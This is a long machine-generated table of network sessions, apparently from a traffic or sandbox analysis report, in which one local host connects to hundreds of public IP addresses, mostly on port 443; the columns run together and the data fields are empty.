                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19976192.168.2.1440090174.49.160.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19977192.168.2.143569249.93.255.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19978192.168.2.1437798177.245.129.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19979192.168.2.1434274207.65.23.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19980192.168.2.144087681.247.204.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19981192.168.2.1447486163.132.183.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19982192.168.2.145633698.107.32.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19983192.168.2.1445932192.191.116.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19984192.168.2.145727854.93.247.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19985192.168.2.144951019.206.38.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19986192.168.2.1436630141.138.125.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19987192.168.2.1440818157.248.247.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19988192.168.2.1450664156.114.114.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19989192.168.2.1457598112.99.253.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19990192.168.2.144749491.150.130.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19991192.168.2.1435810213.141.73.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19992192.168.2.14569861.110.1.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19993192.168.2.1448572155.157.138.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19994192.168.2.1439960134.79.94.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19995192.168.2.1441112182.226.11.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19996192.168.2.143837441.69.22.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19997192.168.2.145884623.1.101.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19998192.168.2.1452516103.179.95.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19999192.168.2.1460198210.78.159.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20000192.168.2.1460284101.63.128.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20001192.168.2.145467846.117.31.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20002192.168.2.143573271.151.192.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20003192.168.2.144070417.142.239.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20004192.168.2.1457150175.65.217.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20005192.168.2.143583623.94.61.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20006192.168.2.143687424.122.79.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20007192.168.2.1440490206.253.162.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20008192.168.2.1438580172.45.10.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20009192.168.2.1447484167.148.137.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20010192.168.2.1454178144.68.146.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20011192.168.2.144920684.44.111.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20012192.168.2.143389881.143.180.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20013192.168.2.1447612113.153.163.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20014192.168.2.14356169.226.140.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20015192.168.2.1452704150.213.96.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20016192.168.2.144838052.221.236.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20017192.168.2.143464441.20.147.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20018192.168.2.145500838.131.171.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20019192.168.2.1436878218.154.168.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20020192.168.2.1456960168.243.91.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20021192.168.2.146016257.94.240.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20022192.168.2.1453390179.150.112.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20023192.168.2.1434394212.38.227.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20024192.168.2.1433844101.93.168.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20025192.168.2.14336941.96.100.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20026192.168.2.1435362166.238.66.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20027192.168.2.1453074197.198.113.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20028192.168.2.145777412.27.60.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20029192.168.2.143458414.201.105.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20030192.168.2.145206490.41.221.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20031192.168.2.1433528126.18.45.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20032192.168.2.145279835.254.13.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20033192.168.2.1448074131.80.34.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20034192.168.2.1459798161.78.131.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20035192.168.2.146007479.66.47.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20036192.168.2.1433144111.42.127.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20037192.168.2.1458216162.168.190.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20038192.168.2.144457043.244.2.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20039192.168.2.1454176129.71.118.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20040192.168.2.1450640150.18.85.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20041192.168.2.143347863.208.129.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20042192.168.2.1460958202.63.26.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20043192.168.2.145677032.10.11.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20044192.168.2.144582648.204.48.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20045192.168.2.1441548124.178.36.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20046192.168.2.145755235.2.98.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20047192.168.2.1436056123.64.173.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20048192.168.2.144100248.218.75.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20049192.168.2.1438758185.23.146.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20050192.168.2.144447286.77.209.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20051192.168.2.1437688171.171.5.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20052192.168.2.144894839.133.2.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20053192.168.2.1445814118.83.43.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20054192.168.2.1433102201.92.182.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20055192.168.2.144763088.250.236.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20056192.168.2.1453132206.128.129.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20057192.168.2.145323425.176.204.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20058192.168.2.1446790149.231.75.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20059192.168.2.145449287.206.134.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20060192.168.2.14438321.164.146.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20061192.168.2.14402825.27.22.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20062192.168.2.1434466194.254.251.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20063192.168.2.14382308.185.87.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20064192.168.2.143324040.53.173.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20065192.168.2.1445114164.67.168.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20066192.168.2.144075419.145.88.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20067192.168.2.1444240110.127.145.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20068192.168.2.1434018167.76.175.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20069192.168.2.143433893.31.40.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20070192.168.2.1456082210.50.107.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20071192.168.2.1435286149.182.114.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20072192.168.2.1446236217.203.95.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20073192.168.2.1452204144.162.168.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20074192.168.2.1458894174.130.203.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20075192.168.2.1437536205.242.3.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20076192.168.2.1448838162.156.152.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20077192.168.2.1449116137.217.101.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20078192.168.2.1446910115.27.28.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20079192.168.2.1442476187.139.159.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20080192.168.2.1453776171.184.71.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20081192.168.2.1442642181.78.149.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20082192.168.2.143772857.250.111.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20083192.168.2.144912459.53.234.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20084192.168.2.1442088198.227.160.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20085192.168.2.146000061.173.138.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20086192.168.2.1454718212.247.164.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20087192.168.2.1456178154.0.41.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20088192.168.2.145669473.65.187.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20089192.168.2.145993873.212.114.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20090192.168.2.144415673.208.114.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20091192.168.2.145462634.132.241.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20092192.168.2.143346834.155.58.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20093192.168.2.1439656159.127.11.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20094192.168.2.143371614.214.162.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20095192.168.2.1452700105.162.174.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20096192.168.2.145110449.19.122.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20097192.168.2.1444190144.106.45.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20098192.168.2.1439504155.208.219.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20099192.168.2.1449000178.48.238.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20100192.168.2.145250243.199.139.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20101192.168.2.1447716173.213.58.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20102192.168.2.1433188149.220.194.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20103192.168.2.1451872204.23.251.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20104192.168.2.145105088.153.107.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20105192.168.2.145518262.120.4.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20106192.168.2.144505462.188.45.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20107192.168.2.1447140118.97.126.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20108192.168.2.1432794148.63.34.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20109192.168.2.1459778147.75.203.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20110192.168.2.1444794181.178.205.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20111192.168.2.1454642163.176.169.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20112192.168.2.1460158199.207.158.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20113192.168.2.145943857.122.119.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20114192.168.2.1434356162.135.14.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20115192.168.2.1448076172.145.134.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20116192.168.2.144540684.21.60.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20117192.168.2.143889818.149.59.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20118192.168.2.144255637.228.96.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20119192.168.2.144569635.118.88.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20120192.168.2.143846893.36.119.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20121192.168.2.144873634.163.105.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20122192.168.2.1438980195.62.231.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20123192.168.2.1448378104.58.249.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20124192.168.2.1442814210.63.21.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20125192.168.2.144921662.154.234.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20126192.168.2.143360486.116.216.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20127192.168.2.14357008.145.156.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20128192.168.2.144358662.172.104.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20129192.168.2.1457902222.145.12.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20130192.168.2.1458826142.137.255.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20131192.168.2.144419096.91.160.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20132192.168.2.1442872211.237.216.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20133192.168.2.144930486.226.184.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20134192.168.2.143571237.14.220.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20135192.168.2.1438994211.34.116.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20136192.168.2.145016424.46.162.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20137192.168.2.144420871.39.50.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20138192.168.2.144815690.111.135.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20139192.168.2.1447646219.244.66.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20140192.168.2.144480012.192.73.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20141192.168.2.143889434.54.67.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20142192.168.2.143335259.46.74.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20143192.168.2.14464941.186.31.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20144192.168.2.144240492.155.194.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20145192.168.2.1453090115.113.110.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20146192.168.2.1445304210.102.29.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20147192.168.2.144865890.132.236.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20148192.168.2.1441484164.139.84.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20149192.168.2.146025864.213.143.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20150192.168.2.1439692129.26.44.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20151192.168.2.1445958110.6.248.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20152192.168.2.1454256135.45.96.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20153192.168.2.1459878103.77.78.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20154192.168.2.144241650.116.60.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20155192.168.2.146051094.198.18.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20156192.168.2.1433328140.84.156.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20157192.168.2.1459406204.38.117.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20158192.168.2.1456206183.207.101.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20159192.168.2.143894683.207.175.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20160192.168.2.1440592207.166.193.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20161192.168.2.1440036190.73.139.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20162192.168.2.1434462134.105.33.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20163192.168.2.1438922112.88.105.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20164192.168.2.1450622212.126.196.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20165192.168.2.1450336131.0.119.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20166192.168.2.14391465.203.155.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20167192.168.2.145924873.49.58.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20168192.168.2.1447512171.189.12.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20169192.168.2.143658427.189.86.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20170192.168.2.1435402154.167.129.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20171192.168.2.145408058.98.244.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20172192.168.2.1436844174.23.75.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20173192.168.2.145888692.6.244.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20174192.168.2.1444808192.58.130.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20175192.168.2.1445554209.141.88.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20176192.168.2.1439448113.126.45.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20177192.168.2.1454440103.181.59.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20178192.168.2.143392248.173.208.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20179192.168.2.144300275.254.231.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20180192.168.2.14503161.184.196.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20181192.168.2.146070047.27.198.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20182192.168.2.1454992159.67.198.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20183192.168.2.1435772104.190.87.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20184192.168.2.145564436.228.40.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20185192.168.2.1438748103.155.16.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20186192.168.2.1445250149.30.19.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20187192.168.2.1454234122.255.189.62443
                                                        TimestampBytes transferredDirectionData


